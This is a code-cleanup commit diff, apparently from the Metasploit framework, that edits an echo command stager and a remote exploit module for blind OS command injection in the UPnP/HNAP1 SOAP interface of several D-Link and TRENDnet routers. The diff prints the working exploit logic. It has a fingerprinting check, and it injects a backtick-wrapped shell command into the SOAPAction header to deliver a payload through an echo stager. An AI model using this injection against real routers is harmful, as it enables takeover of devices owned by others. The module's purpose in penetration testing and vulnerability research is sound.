Do code cleanup
parent
666b0bc34a
commit
8b2e49eabc
|
@ -26,11 +26,10 @@ class CmdStagerEcho < CmdStagerBase
|
|||
# and initialize opts[:enc_format].
|
||||
#
|
||||
def generate(opts = {})
|
||||
if opts[:temp] == false
|
||||
opts[:temp] = ''
|
||||
else
|
||||
opts[:temp] = opts[:temp] || '/tmp/'
|
||||
opts[:temp].gsub!(/\\/, "/")
|
||||
|
||||
unless opts[:temp].empty?
|
||||
opts[:temp].gsub!(/\\/, '/')
|
||||
opts[:temp] = opts[:temp].shellescape
|
||||
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
|
||||
end
|
||||
|
|
|
@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
|
||||
interface. Since it is a blind OS command injection vulnerability, there is no
|
||||
output for the executed command. This module has been tested on a DIR-645 device.
|
||||
The following devices are also reported as affected:
|
||||
DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB
|
||||
DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
|
||||
The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
|
||||
DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
|
||||
DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -36,21 +36,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Feb 13 2015',
|
||||
'Privileged' => true,
|
||||
'Platform' => 'unix',
|
||||
'Platform' => 'linux',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MIPS Little Endian',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSLE
|
||||
}
|
||||
],
|
||||
[ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_MIPSBE
|
||||
}
|
||||
],
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
@ -60,16 +58,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
uri = '/HNAP1/'
|
||||
soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings"
|
||||
soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'SOAPAction' => soapaction,
|
||||
},
|
||||
'SOAPAction' => soap_action,
|
||||
}
|
||||
})
|
||||
|
||||
if res && [200].include?(res.code) && res.body =~ /D-Link/
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
@ -92,26 +91,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
execute_cmdstager(
|
||||
:flavor => :echo,
|
||||
:linemax => 200,
|
||||
:temp => false
|
||||
:temp => ''
|
||||
)
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
|
||||
uri = '/HNAP1/'
|
||||
|
||||
cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd
|
||||
soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
|
||||
cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
|
||||
soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'SOAPAction' => soapaction,
|
||||
},
|
||||
},1)
|
||||
'SOAPAction' => soap_action,
|
||||
}
|
||||
}, 3)
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue